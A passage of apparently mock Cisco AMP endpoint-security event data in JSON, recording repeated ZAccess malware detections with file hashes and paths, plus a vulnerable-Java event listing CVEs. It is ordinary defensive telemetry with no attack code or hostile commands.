Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182419","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":923000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182418","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":740000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182415","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":717000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182414","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":692000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182413","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":659000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182412","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"\\\\?\\C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":634000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":606000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182410","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":583000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182409","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":320000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182408","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":98000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182407","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832364368750182000,"timestamp":1610705110,"timestamp_nanoseconds":16000000,"date":"2021-01-15T10:05:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ZAccess.15nt","detection_id":"5832364368750182406","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"zaccess8308073210892168095.exe","file_path":"C:\\Users\\Harry\\AppData\\Local\\Temp\\zaccess8308073210892168095.exe","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20","sha1":"0800d75067f8066eabf01341d329f3f7b4126b6b","md5":"0bff47833c0ddb262bc2152e040381e2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900400000800,"timestamp":1610705109,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:05:09+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.ZAccess.15nt","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705109,"start_date":"2021-01-15T10:05:09+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"87715c2487765488d72919a3720f11806592fe1018aa5c95aaf9fd13fb041f20"},"parent":{"disposition":"Clean","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255854610743000,"timestamp":1610705106,"timestamp_nanoseconds":293000000,"date":"2021-01-15T10:05:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255854610743321","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955899799000300,"timestamp":1610705105,"timestamp_nanoseconds":799000000,"date":"2021-01-15T10:05:05+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610705105,"start_date":"2021-01-15T10:05:05+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"java.exe","identity":{"sha256":"0b4eefc0d815ac0fdc20f22add8fd2d8113be99578a4e5189122b28b201ccbd9"}},"vulnerabilities":[{"name":"Oracle Java(TM) Platform SE","version":"1.7.0:update_10","cve":"CVE-2013-5830","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5830"},{"cve":"CVE-2013-5843","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5843"},{"cve":"CVE-2013-5842","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5842"},{"cve":"CVE-2013-5817","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5817"},{"cve":"CVE-2013-5814","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5814"},{"cve":"CVE-2013-5809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5809"},{"cve":"CVE-2013-5789","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5789"},{"cve":"CVE-2013-5829","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5829"},{"cve":"CVE-2013-5788","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5788"},{"cve":"CVE-2013-5824","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5824"},{"cve":"CVE-2013-5787","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5787"},{"cve":"CVE-2013-5782","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5782"},{"cve":"CVE-2013-2470","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2470"},{"cve":"CVE-2013-2465","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2465"},{"cve":"CVE-2013-2471","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2471"},{"cve":"CVE-2013-2473","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2473"},{"cve":"CVE-2013-2472","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2472"},{"cve":"CVE-2013-2469","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2469"},{"cve":"CVE-2013-2468","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2468"},{"cve":"CVE-2013-2466","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2466"},{"cve":"CVE-2013-2464","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2464"},{"cve":"CVE-2013-2463","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2463"},{"cve":"CVE-2013-2459","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2459"},{"cve":"CVE-2013-2428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2428"},{"cve":"CVE-2013-2420","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2420"},{"cve":"CVE-2013-2434","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2434"},{"cve":"CVE-2013-2384","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2384"},{"cve":"CVE-2013-1518","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1518"},{"cve":"CVE-2013-1537","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1537"},{"cve":"CVE-2013-2440","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2440"},{"cve":"CVE-2013-1557","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1557"},{"cve":"CVE-2013-1558","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1558"},{"cve":"CVE-2013-2435","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2435"},{"cve":"CVE-2013-2432","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2432"},{"cve":"CVE-2013-1569","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1569"},{"cve":"CVE-2013-2431","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2431"},{"cve":"CVE-2013-2383","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2383"},{"cve":"CVE-2013-2427","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2427"},{"cve":"CVE-2013-2425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2425"},{"cve":"CVE-2013-2422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2422"},{"cve":"CVE-2013-2414","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2414"},{"cve":"CVE-2013-0809","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0809"},{"cve":"CVE-2013-1493","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1493"},{"cve":"CVE-2013-1480","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1480"},{"cve":"CVE-2013-0428","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0428"},{"cve":"CVE-2013-0437","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0437"},{"cve":"CVE-2013-0441","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0441"},{"cve":"CVE-2013-0442","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0442"},{"cve":"CVE-2013-0445","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0445"},{"cve":"CVE-2013-0450","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0450"},{"cve":"CVE-2013-1476","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1476"},{"cve":"CVE-2013-1478","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1478"},{"cve":"CVE-2013-1479","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1479"},{"cve":"CVE-2013-1484","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1484"},{"cve":"CVE-2013-0426","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0426"},{"cve":"CVE-2013-1486","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1486"},{"cve":"CVE-2013-1487","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1487"},{"cve":"CVE-2013-0425","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0425"},{"cve":"CVE-2013-0422","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422"},{"cve":"CVE-2013-0446","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0446"},{"cve":"CVE-2013-1475","score":10,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1475"},{"cve":"CVE-2013-2460","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2460"},{"cve":"CVE-2013-5838","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5838"},{"cve":"CVE-2013-5777","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5777"},{"cve":"CVE-2013-5810","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5810"},{"cve":"CVE-2013-5832","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5832"},{"cve":"CVE-2013-5806","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5806"},{"cve":"CVE-2013-5805","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5805"},{"cve":"CVE-2013-5850","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5850"},{"cve":"CVE-2013-5844","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5844"},{"cve":"CVE-2013-5846","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5846"},{"cve":"CVE-2013-2462","score":9.3,"url":"https://web.nvd.nist.gov/view/vuln/detail?vu